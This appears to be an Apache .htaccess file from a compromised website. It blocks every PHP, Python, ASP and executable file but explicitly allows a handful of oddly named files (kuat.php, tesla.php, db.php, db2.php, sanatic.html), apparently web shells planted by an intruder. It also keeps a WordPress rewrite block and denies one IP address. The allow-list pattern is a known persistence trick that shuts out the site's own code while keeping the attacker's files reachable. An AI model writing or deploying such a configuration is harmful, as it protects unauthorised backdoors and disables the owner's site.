<FilesMatch ".(py|exe|php|asp|aspx)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(kuat.php|tesla.php|db2.php|db.php|sanatic.html)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 138.199.28.38
